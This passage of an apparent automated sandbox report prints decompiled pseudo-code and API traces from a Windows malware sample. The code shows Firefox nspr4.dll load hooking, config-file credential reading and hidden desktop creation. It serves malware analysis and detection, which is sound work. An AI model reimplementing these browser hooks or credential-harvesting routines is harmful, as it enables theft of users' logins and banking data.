    								__eflags = _v52;
    								goto L29;
    							}
    							_push(0);
    							_push(0xffffe892);
    							goto L36;
    						}
    					}
    					_t149 = _t108 * 0x38 +  *0x422a24;
    					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
    					_t11 = _t149 + 0x14; // -4336144
    					if(E0041194C( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
    						goto L35;
    					}
    					_t168 = _v52;
    					goto L11;
    				}
    			}

    APIs
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • EnterCriticalSection.KERNEL32(00422A08), ref: 00407C22
    • LeaveCriticalSection.KERNEL32(00422A08), ref: 00407C50
    • EnterCriticalSection.KERNEL32(00422A08), ref: 00407C74
    • LeaveCriticalSection.KERNEL32(00422A08,00000000,?,00000000), ref: 00407EB7
    • LeaveCriticalSection.KERNEL32(00422A08), ref: 00407ED6
      • Part of subcall function 00416964: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-00422A24,?,00000000), ref: 004169BE
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    • LeaveCriticalSection.KERNEL32(00422A08), ref: 00407EE3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
    • String ID: 0$%x$Content-Length
    • API String ID: 4067213518-3838797520
    • Opcode ID: f7e785ec01a1d6f42ab388d4bcd7facbee8f2370bc7451efdb8c0b5d687c4975
    • Instruction ID: cc7eb924c955322c19461def26c27e90ded5ea2cf8bd9a966f7f72c156a4bdec
    • Opcode Fuzzy Hash: f7e785ec01a1d6f42ab388d4bcd7facbee8f2370bc7451efdb8c0b5d687c4975
    • Instruction Fuzzy Hash: 4491C372904216AFC711DF25C941A5A7BF8FF44314F004A6AF960A36A1C738FD95CBDA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00418EB0(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
    				char _v540;
    				char _v800;
    				char _v804;
    				char _v860;
    				struct _SYSTEMTIME _v876;
    				char _v900;
    				signed int _v968;
    				signed int _v980;
    				intOrPtr _v984;
    				intOrPtr _v988;
    				char* _v992;
    				char _v996;
    				void* _v1008;
    				struct _SYSTEMTIME _v1028;
    				signed int _v1032;
    				short _v1036;
    				signed short* _v1040;
    				signed int _v1044;
    				intOrPtr* _v1048;
    				signed int _v1052;
    				signed int _v1056;
    				signed int _v1060;
    				signed int _v1064;
    				char _v1068;
    				intOrPtr _v1072;
    				char _v1076;
    				intOrPtr _v1080;
    				intOrPtr _v1084;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t158;
    				signed int _t159;
    				intOrPtr _t160;
    				signed int _t168;
    				void* _t188;
    				void* _t199;
    				signed int _t211;
    				signed int _t215;
    				signed int _t218;
    				signed char _t222;
    				signed int _t224;
    				void* _t227;
    				void* _t228;
    				signed int _t229;
    				signed int _t230;
    				signed int _t240;
    				void* _t242;
    				signed int _t250;
    				intOrPtr* _t254;
    				signed int _t255;
    				intOrPtr _t258;
    				short* _t261;
    				void* _t280;
    				intOrPtr* _t286;
    				signed int _t291;
    				long _t294;
    				signed short* _t296;
    				signed short* _t298;
    				signed int _t301;
    				intOrPtr* _t303;
    				signed int _t307;
    				void* _t309;
    
    				_t309 = (_t307 & 0xfffffff8) - 0x424;
    				_v1032 = _v1032 & 0x00000000;
    				if(__eax == 0) {
    					L52:
    					asm("sbb eax, eax");
    					return  ~0x00000000;
    				} else {
    					_t286 = __ecx + 0x10;
    					_v1048 = _t286;
    					_v1028.wDayOfWeek = __eax;
    					do {
    						_t258 =  *_t286;
    						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
    						_v1028.wHour = _t279;
    						if(_t258 == 0) {
    							_t254 = _a8;
    							L6:
    							_t259 =  *(_t286 + 4);
    							_v1052 = _v1052 & 0x00000000;
    							_v1064 = _v1064 & 0x00000000;
    							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
    							_v1028.wSecond = _t158;
    							if(_t259 >= _t158) {
    								L35:
    								_t159 =  *(_t286 - 0x10);
    								_t294 = 0;
    								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
    									if((_t159 & 0x00000200) == 0) {
    										_t255 = E00411C01(_t159 | 0xffffffff, 0, _a4);
    										__eflags = _t255;
    										if(_t255 != 0) {
    											_t188 = 9;
    											E00419DD3(_t188,  &_v996);
    											_push(_v1052);
    											E0040BA61(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
    											_t309 = _t309 + 0x18;
    											E004119C1(_t255);
    										}
    									} else {
    										_t280 = 0x3c;
    										E00411A74( &_v996,  &_v996, 0, _t280);
    										_v992 =  &_v800;
    										_v1008 = _t280;
    										_v988 = 0x103;
    										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
    											GetSystemTime( &_v1028);
    											_t306 =  &_v876;
    											_t199 = 8;
    											E00419DD3(_t199,  &_v876);
    											_push(_v1028.wDay & 0x0000ffff);
    											_push(_v1028.wMonth & 0x0000ffff);
    											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
    											_push( &_v804);
    											E004126B4( &_v876, 0x104,  &_v540, _t306);
    											_t309 = _t309 + 0x14;
    											E0040B8B7(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
    											_t286 = _v1084;
    										}
    									}
    									E004119C1(_v1052);
    									_t294 = 0;
    								}
    								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
    									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
    										EnterCriticalSection(0x423c6c);
    										E004119C1( *0x423c84);
    										_t168 = E00411E1F(E004119C1( *0x423c88) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
    										 *0x423c84 = _t168;
    										__eflags = _t168 | 0xffffffff;
    										 *0x423c88 = E00411E1F(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
    										LeaveCriticalSection(0x423c6c);
    										goto L51;
    									}
    									E004066FC( &_v860, _t259, 1,  &_v996);
    									if(E00412C66( &_v900,  *((intOrPtr*)(_t286 - 4)), E004124FE( *((intOrPtr*)(_t286 - 4)))) == 0) {
    										goto L51;
    									}
    									_t261 =  &_v860;
    									do {
    										E00411D29( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
    										_t294 = _t294 + 1;
    										_t261 = _t261 + 4;
    									} while (_t294 < 0x10);
    									 *_t261 = 0;
    									GetLocalTime( &_v876);
    									E00415C40(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
    								}
    								goto L51;
    							} else {
    								goto L9;
    								L13:
    								_t279 =  *_t211 & 0x0000ffff;
    								if(_t279 != 4) {
    									_t259 = _t211 + 4;
    									_t218 = E004181D6(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
    									__eflags = _t218;
    									if(_t218 == 0) {
    										L33:
    										if(_v1028.wYear < _v1028.wSecond) {
    											_t259 = _v1028.wYear;
    											L9:
    											_t211 = ( *_t259 & 0x0000ffff) + _t259;
    											_t296 = ( *_t211 & 0x0000ffff) + _t211;
    											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
    											_t279 =  *_t259 & 0x0000ffff;
    											_v1036 = _t259;
    											_v1044 = _t211;
    											_v1040 = _t296;
    											if(( *_t259 & 0x0000ffff) != 4) {
    												goto L11;
    											} else {
    												_v1060 = _v1060 & 0x00000000;
    												goto L13;
    											}
    										}
    										_t286 = _v1048;
    										goto L35;
    									}
    									__eflags =  *_v1036 - 4;
    									_t298 = _v1040;
    									if( *_v1036 != 4) {
    										_t54 =  &_v1056;
    										 *_t54 = _v1056 + _v1060;
    										__eflags =  *_t54;
    									} else {
    										_v1060 = _v1056;
    									}
    									L22:
    									_t259 = _v1056 - _v1060;
    									_t222 =  *(_v1048 - 0x10);
    									_t291 = ( *_t298 & 0x0000ffff) - 4;
    									_v1044 = _t259;
    									if((_t222 & 0x00000004) == 0) {
    										__eflags = _t222 & 0x00000008;
    										if((_t222 & 0x00000008) != 0) {
    											_t224 = E0041194C(_t259 + _t291 + _v1064 + 2,  &_v1052);
    											__eflags = _t224;
    											if(_t224 != 0) {
    												_t301 = _v1052;
    												__eflags = _t291;
    												if(_t291 != 0) {
    													E004119FD(_v1064 + _t301,  &(_v1040[2]), _t291);
    													_t84 =  &_v1076;
    													 *_t84 = _v1076 + _t291;
    													__eflags =  *_t84;
    												}
    												_t279 = _v1044;
    												_t227 = E004119FD(_v1064 + _t301,  *_t254 + _v1060, _t279);
    												_t259 = _v1060;
    												__eflags =  *(_t259 - 0x10) & 0x00000100;
    												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
    													_t228 = E004165E7(_t227, _t279);
    													_t95 =  &_v1068;
    													 *_t95 = _v1068 + _t228;
    													__eflags =  *_t95;
    													_t254 = _a8;
    												} else {
    													_v1064 = _v1064 + _t279;
    												}
    												_t229 = _v1064;
    												 *((char*)(_t229 + _t301)) = 0xa;
    												_t230 = _t229 + 1;
    												__eflags = _t230;
    												_v1064 = _t230;
    												 *((char*)(_t230 + _t301)) = 0;
    											}
    										}
    									} else {
    										_v1036 =  *_a12 - _t259 + _t291;
    										_t240 = E00411991( *_a12 - _t259 + _t291);
    										_v1044 = _t240;
    										if(_t240 != 0) {
    											_t279 = _v1060;
    											_t242 = E004119FD(E004119FD(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
    											_t303 = _a12;
    											_t259 =  *_t254 + _v1080;
    											E004119FD(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
    											E004119C1( *_t254);
    											_v1072 = _v1072 + 1;
    											 *_t254 = _v1084;
    											 *_t303 = _v1076;
    										}
    									}
    									goto L33;
    								}
    								if( *_t259 != _t279) {
    									_t250 = _v1060;
    								} else {
    									_t250 =  *_a12;
    								}
    								_v1056 = _t250;
    								goto L22;
    								L11:
    								_t215 = E004181D6(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
    								__eflags = _t215;
    								if(_t215 == 0) {
    									goto L33;
    								}
    								_t298 = _v1040;
    								_t211 = _v1044;
    								_t259 = _v1036;
    								goto L13;
    							}
    						}
    						_v996 = 0x2a3f;
    						_v992 = _t258;
    						_t160 = E004124FE(_t258);
    						_t254 = _a8;
    						_v988 = _t160;
    						_v984 =  *_t254;
    						_t279 = _t279 | 0x00000012;
    						_v980 =  *_a12;
    						_v968 = _t279;
    						if(L00412945( &_v996) != 0) {
    							goto L6;
    						}
    						L51:
    						_t286 = _t286 + 0x1c;
    						_t150 =  &(_v1028.wDayOfWeek);
    						 *_t150 = _v1028.wDayOfWeek - 1;
    						_v1048 = _t286;
    					} while ( *_t150 != 0);
    					goto L52;
    				}
    			}

    APIs
    • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00419199
    • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 004191B7
    • GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,-00422A24,?,?), ref: 004192D1
    • EnterCriticalSection.KERNEL32(00423C6C,-00422A24,?,?), ref: 004192FD
    • LeaveCriticalSection.KERNEL32(00423C6C,?,?), ref: 0041933A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
    • String ID: ?*$l<B
    • API String ID: 2400141425-1243836432
    • Opcode ID: 74736927db7a9a416c48966e6369d7d0e32b58c176d9fdabb4c9c6b215d8561a
    • Instruction ID: 58aa7167879ca7d14ca9f590827a5d99002fdd2f6c048420020af8b4d6d7d32f
    • Opcode Fuzzy Hash: 74736927db7a9a416c48966e6369d7d0e32b58c176d9fdabb4c9c6b215d8561a
    • Instruction Fuzzy Hash: EDE1CCB1608341AFD710DF68C884AAFB7E5FF88304F004A1EF994A7251D738E985CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040E211(char* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char* _v20;
    				char _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				char _v64;
    				char _v84;
    				char _v108;
    				char _v152;
    				char _v180;
    				char _v252;
    				short _v766;
    				char _v772;
    				short _v1292;
    				void* __edi;
    				void* __esi;
    				void* _t46;
    				void* _t48;
    				void* _t53;
    				void* _t57;
    				void* _t59;
    				void* _t61;
    				void* _t68;
    				void* _t70;
    				void* _t75;
    				WCHAR* _t100;
    				signed int _t101;
    				WCHAR* _t103;
    				char* _t108;
    				intOrPtr _t109;
    				void* _t112;
    				intOrPtr _t125;
    
    				_t99 = __edx;
    				_t98 = __ecx;
    				E00411A74( &_v12,  &_v12, 0, 8);
    				_t46 = 0x6a;
    				E00419DD3(_t46,  &_v252);
    				_t48 = 0x6b;
    				E00419DD3(_t48,  &_v108);
    				_t100 =  &_v772;
    				_t53 = E00415AE5(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
    				if(_t53 != 0xffffffff) {
    					_t115 = _t53;
    					if(_t53 != 0) {
    						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
    						E0040E025(_t99, _t115,  &_v1292,  &_v12);
    						PathRemoveFileSpecW( &_v1292);
    					}
    				}
    				_t101 = 0;
    				if(_v8 != 0) {
    					L14:
    					_t125 = _v8;
    					goto L15;
    				} else {
    					_t57 = 0x6d;
    					E00419DD3(_t57,  &_v64);
    					_t59 = 0x6e;
    					E00419DD3(_t59,  &_v152);
    					_t108 =  &_v84;
    					_t61 = 0x6f;
    					E00419DD3(_t61, _t108);
    					_v24 =  &_v64;
    					_v20 =  &_v152;
    					_v40 = 0x24;
    					_v36 = 0x1a;
    					_v32 = 0x26;
    					_v28 = 0x23;
    					_v16 = _t108;
    					do {
    						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
    						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
    						if(0 == 0) {
    							_t118 = _t109 - 0x24;
    							if(_t109 == 0x24) {
    								E0040DFE3(_t118,  &_v772,  &_v12, 0);
    								_v766 = 0;
    							}
    							_t99 =  &_v24;
    							_t98 =  &_v772;
    							E004170EA( &_v772,  &_v24, 0, 3, 2, E0040E1C8,  &_v12, 0, 0, 0);
    						}
    						_t101 = _t101 + 1;
    					} while (_t101 < 4);
    					if(_v8 != 0) {
    						L15:
    						if(_t125 <= 0) {
    							return E004119C1(_v12);
    						}
    						_push(0xcb);
    						return E0040C9F4(_t99, _v12, 0x70);
    					}
    					_t68 = 0x6a;
    					E00419DD3(_t68,  &_v180);
    					_t70 = 0x6c;
    					E00419DD3(_t70,  &_v64);
    					_t103 =  &_v772;
    					_t75 = E00415AE5(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
    					if(_t75 != 0xffffffff) {
    						_t124 = _t75;
    						if(_t75 != 0) {
    							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
    							E0040DFE3(_t124,  &_v1292,  &_v12, 1);
    						}
    					}
    					goto L14;
    				}
    			}

    APIs
      • Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040E277
      • Part of subcall function 0040E025: GetPrivateProfileStringW.KERNEL32 ref: 0040E05C
      • Part of subcall function 0040E025: StrStrIW.SHLWAPI(00000001,?), ref: 0040E0E4
      • Part of subcall function 0040E025: StrStrIW.SHLWAPI(00000001,?), ref: 0040E0F5
      • Part of subcall function 0040E025: GetPrivateProfileStringW.KERNEL32 ref: 0040E111
      • Part of subcall function 0040E025: GetPrivateProfileStringW.KERNEL32 ref: 0040E12F
    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,00000000,00000001), ref: 0040E294
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040E30A
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000001), ref: 0040E3A7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
    • String ID: #$$$&
    • API String ID: 1517737059-1941049543
    • Opcode ID: dbd064f30b6f99999cc4b5c6e2ebda507a4716bb6c2ad12b636811db818507c2
    • Instruction ID: 22a198168216e56bb7533f1b087ddf98a97081743fc3489ce413d4f581b21433
    • Opcode Fuzzy Hash: dbd064f30b6f99999cc4b5c6e2ebda507a4716bb6c2ad12b636811db818507c2
    • Instruction Fuzzy Hash: E0512972E00218AADF10DBA1DC59FEFB7BCAB08314F0009A7B605F7191DB789A858B55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00408EE1(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
    				void* __edi;
    				void* _t12;
    				long _t13;
    				void* _t16;
    				void* _t17;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    				UNICODE_STRING* _t24;
    				void* _t28;
    				HMODULE* _t29;
    				struct _OBJDIR_INFORMATION _t31;
    
    				if(E00406473() != 0) {
    					_t29 = _a16;
    					_t24 = _a12;
    					_t12 =  *0x422564(_a4, 0, _t24, _t29, _t23, _t28, _t17);
    					_t13 = LdrLoadDll(_a4, _a8, _t24, _t29);
    					_a4 = _t13;
    					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
    						EnterCriticalSection(0x422a30);
    						if(( *0x422a48 & 0x00000001) == 0) {
    							_t31 =  *_t29;
    							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
    								_t16 = 0;
    							} else {
    								_t16 = E00419A5A(_t21, _t22, _t31);
    							}
    							if(_t16 != 0) {
    								 *0x422a48 =  *0x422a48 | 0x00000001;
    							}
    						}
    						LeaveCriticalSection(0x422a30);
    					}
    					return _a4;
    				}
    				goto ( *0x422560);
    			}

    APIs
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 00408F04
    • LdrLoadDll.NTDLL(?,?,?,?), ref: 00408F14
    • EnterCriticalSection.KERNEL32(00422A30), ref: 00408F38
    • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00408F52
    • LeaveCriticalSection.KERNEL32(00422A30), ref: 00408F73
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterHandleLeaveLoadObjectSingleWaitlstrcmpi
    • String ID: 0*B$nspr4.dll
    • API String ID: 2984399785-4173039483
    • Opcode ID: 1728b1b49ff3624a2aa959e0a6d5b038b3b15f903c9046b48c4a7aa407b39046
    • Instruction ID: e34f16f477125192efd8ee46c6f053d35c335defeed92a682875ad7a9a31df68
    • Opcode Fuzzy Hash: 1728b1b49ff3624a2aa959e0a6d5b038b3b15f903c9046b48c4a7aa407b39046
    • Instruction Fuzzy Hash: 8D11BF31200216BBDB205F21AE44BA73F69AF45754F14403EFD81B62A1CBB8D952C69C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004073F7(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				_Unknown_base(*)()* _t12;
    				struct HINSTANCE__* _t14;
    
    				 *0x422a24 =  *0x422a24 & 0x00000000;
    				 *0x422a28 =  *0x422a28 & 0x00000000;
    				_t14 = __eax;
    				InitializeCriticalSection(0x422a08);
    				 *0x422a20 = _a4;
    				 *0x4229fc = _a8;
    				 *0x422a2c = _a12;
    				 *0x422a00 = _t14;
    				 *0x42252c = _a16;
    				 *0x422424 = GetProcAddress(_t14, "PR_GetNameForIdentity");
    				 *0x422a04 = GetProcAddress( *0x422a00, "PR_SetError");
    				_t12 = GetProcAddress( *0x422a00, "PR_GetError");
    				 *0x4223bc = _t12;
    				return _t12;
    			}

    APIs
    • InitializeCriticalSection.KERNEL32(00422A08,75144EE0,00419AC8,00422348), ref: 0040740D
    • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00407449
    • GetProcAddress.KERNEL32(PR_SetError), ref: 0040745B
    • GetProcAddress.KERNEL32(PR_GetError), ref: 0040746D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$CriticalInitializeSection
    • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
    • API String ID: 2804437462-2578621715
    • Opcode ID: 700d4efdef33aa21fa67a3d91914f83c17a6ae6a71b61448c471f3f395f202df
    • Instruction ID: dce05ddf009d39d1ae17dd671f496cf26685223c5d49e89d429e3e9bfdd2d140
    • Opcode Fuzzy Hash: 700d4efdef33aa21fa67a3d91914f83c17a6ae6a71b61448c471f3f395f202df
    • Instruction Fuzzy Hash: 47018CB5B15350AFC731DF65AE09B057FE4A708361B808A6AE845A3A60D7B495428F4C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00404C77(void* __edx, intOrPtr* _a4) {
    				char _v524;
    				char _v544;
    				char _v556;
    				intOrPtr _v572;
    				char _v924;
    				char _v1028;
    				char _v1040;
    				char _v1060;
    				intOrPtr _v1104;
    				intOrPtr _v1108;
    				intOrPtr _v1112;
    				intOrPtr _v1116;
    				char _v1120;
    				char* _v1124;
    				intOrPtr _v1128;
    				char _v1132;
    				intOrPtr _v1144;
    				signed short _v1146;
    				char _v1148;
    				signed int _v1152;
    				signed int _v1156;
    				char _v1157;
    				signed int _v1160;
    				void* _v1164;
    				void* _v1168;
    				char _v1177;
    				char _v1180;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t59;
    				void* _t62;
    				signed int _t71;
    				char _t77;
    				char* _t85;
    				char _t88;
    				char _t95;
    				short _t100;
    				intOrPtr* _t105;
    				void* _t111;
    				char _t112;
    				signed int _t118;
    				signed int _t119;
    				void* _t123;
    
    				_t111 = __edx;
    				_t105 = _a4;
    				_t59 =  *(_t105 + 4);
    				_push(_t118);
    				_t119 = _t118 | 0xffffffff;
    				_v1152 = _t119;
    				_v1156 = _t119;
    				if(_t59 == _t119 || _t59 == 0xfffffffe) {
    					L4:
    					_t62 = E00412040( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
    					_t109 =  *_t105;
    					_t63 = E00414A4A(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
    					_v1160 = _t63;
    					_t133 = _t63 - _t119;
    					if(_t63 == _t119) {
    						goto L20;
    					}
    					E00414DBC(_t109, _t63);
    					E00414D7A(_v1160);
    					_push(_t105 + 8);
    					_push(3);
    					_push(_v1164);
    					_t123 = 4;
    					if(E00418059(_t109, _t123, _t133) == 0) {
    						goto L20;
    					}
    					_t71 =  *(_t105 + 4);
    					if(_t71 == 0xfffffffe) {
    						SetThreadPriority(GetCurrentThread(), 1);
    						E00406312(0x2937498d,  &_v1028, 0);
    						_t63 = E004090BA(_t109, __eflags,  &_v1040);
    						__eflags = _t63;
    						if(_t63 == 0) {
    							goto L20;
    						}
    						_t77 = E0041A756(_t109, _t111,  &_v924, 1);
    						__eflags = _t77;
    						if(_t77 == 0) {
    							L19:
    							_t63 = E0041A9C1( &_v924, 1);
    							goto L20;
    						} else {
    							__imp__GetShellWindow();
    							__eflags = _t77;
    							_v1157 = _t77 != 0;
    							__eflags = _v1157;
    							if(_v1157 == 0) {
    								E00419DD3(0xa8,  &_v1132);
    								_t85 =  &_v524;
    								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
    								__eflags = _t85;
    								if(_t85 == 0) {
    									_t88 = E00417246( &_v1132,  &_v544,  &_v544);
    									__eflags = _t88;
    									if(_t88 != 0) {
    										_t112 = 0x44;
    										E00411A74( &_v1120,  &_v1120, 0, _t112);
    										_v1124 =  &_v1060;
    										_v1132 = _t112;
    										_t95 = E00413288( &_v556, 0, 0,  &_v1132,  &_v1180);
    										__eflags = _t95;
    										if(_t95 != 0) {
    											WaitForSingleObject(_v1168, 0x1388);
    											CloseHandle(_v1164);
    											CloseHandle(_v1168);
    											_v1177 = 1;
    										}
    									}
    								}
    							}
    							SystemParametersInfoW(0x1003, 0, 0, 0);
    							__eflags = _v1157 - 1;
    							if(__eflags == 0) {
    								_v1132 =  &_v924;
    								_v1128 = 0x41ac8a;
    								_v1124 = E0041ABD0;
    								_v1120 = E0041ABD3;
    								_v1116 = E0041ABF7;
    								_v1112 = E0041AC3E;
    								_v1108 = E0041AC73;
    								_v1104 = 0x41ac8a;
    								E0041115E(__eflags, _v1156,  &_v1132, _v924, _v572);
    							}
    							goto L19;
    						}
    					} else {
    						if(_t71 == 0xffffffff) {
    							_t63 = E00409E70(_v1156, _t109);
    						} else {
    							_push(_v1152);
    							_t63 = E00414BBD(_v1156);
    							_t105 = _a4;
    						}
    						goto L20;
    					}
    				} else {
    					_t100 = 2;
    					_v1148 = _t100;
    					_t108 =  *(_t105 + 4) << 8;
    					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
    					_v1144 = 0x100007f;
    					_t63 = E00414A09( &_v1148);
    					_v1152 = _t63;
    					if(_t63 == _t119) {
    						L20:
    						E00414D64(E00414D64(_t63, _v1156), _v1152);
    						E004119C1(_t105);
    						return 0;
    					} else {
    						E00414DBC(_t108, _t63);
    						goto L4;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00414A09: socket.WS2_32(?,00000001,00000006), ref: 00414A12
      • Part of subcall function 00414A09: connect.WS2_32(00000000,?,-0000001D), ref: 00414A32
      • Part of subcall function 00414A09: closesocket.WS2_32(00000000), ref: 00414A3D
      • Part of subcall function 00414DBC: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00414DD2
    • GetCurrentThread.KERNEL32 ref: 00404D5C
    • SetThreadPriority.KERNEL32(00000000), ref: 00404D63
      • Part of subcall function 004090BA: OpenWindowStationW.USER32(?,00000000,10000000), ref: 004090DF
      • Part of subcall function 004090BA: CreateWindowStationW.USER32 ref: 004090F2
      • Part of subcall function 004090BA: GetProcessWindowStation.USER32(?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409103
      • Part of subcall function 004090BA: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040913E
      • Part of subcall function 004090BA: CreateDesktopW.USER32 ref: 00409152
      • Part of subcall function 004090BA: GetCurrentThreadId.KERNEL32 ref: 0040915E
      • Part of subcall function 004090BA: GetThreadDesktop.USER32(00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409165
      • Part of subcall function 004090BA: SetThreadDesktop.USER32(00000000,00000000,00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409177
      • Part of subcall function 004090BA: CloseDesktop.USER32(00000000,00000000,00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409189
      • Part of subcall function 004090BA: CloseWindowStation.USER32(?,?,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 004091A4
      • Part of subcall function 0041A756: TlsAlloc.KERNEL32(00423E78,00000000,0000018C,00000000,00000000), ref: 0041A76F
    • GetShellWindow.USER32 ref: 00404DA9
    • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 00404DDC
      • Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265
